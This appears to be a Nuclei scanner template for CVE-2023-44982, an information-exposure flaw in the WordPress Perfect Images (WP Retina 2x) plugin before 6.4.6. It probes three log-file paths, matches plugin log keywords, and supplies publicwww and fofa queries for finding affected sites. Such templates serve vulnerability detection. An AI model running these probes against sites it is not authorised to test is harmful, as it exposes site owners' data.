id: CVE-2023-44982 info: name: WordPress Perfect Images (WP Retina 2x) < 6.4.6 - Sensitive Information Exposure author: pussycat0x severity: medium description: | Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina) versions up to 6.4.5 contain a vulnerability that exposes sensitive information to unauthorized actors, letting attackers access confidential data, exploit requires no specific conditions. impact: | Unauthorized actors can access sensitive information, leading to privacy breaches and potential data misuse. remediation: | Update to version 6.4.6 or later. reference: - https://wpscan.com/vulnerability/aba0c4a1-e253-4b5b-b46d-239567567b16/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-44982 cwe-id: CWE-200 epss-score: 0.12906 epss-percentile: 0.94241 metadata: verified: true max-request: 3 vendor: meowapps product: perfect-images framework: wordpress publicwww-query: "/wp-content/plugins/wp-retina-2x/" fofa-query: body="/wp-content/plugins/wp-retina-2x/" tags: cve,cve2023,wordpress,wp-plugin,wp-retina-2x http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/wp-retina-2x/classes/wp-retina-2x.log" - "{{BaseURL}}/wp-content/uploads/wp-retina-2x.log" - "{{BaseURL}}/wp-content/uploads/wp-retina-2x-logs.txt" stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - "RETINA" - "PATH" - "thumbnail" - "wp-content" - "Full-Size" - "uploads" condition: and - type: regex part: body regex: - '\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}:' - type: status status: - 200 # digest: 4a0a00473045022100a5e4f2b1295a660ea9dc8d5ef632257ce67b7b206d90bdea693ca9fb5d5dc46f022020c84638c5c986aee354fd420afd6c5f612d8136b8a87fe51b0e03b0e72bfd53:922c64590222798bb761d5b6d8e72950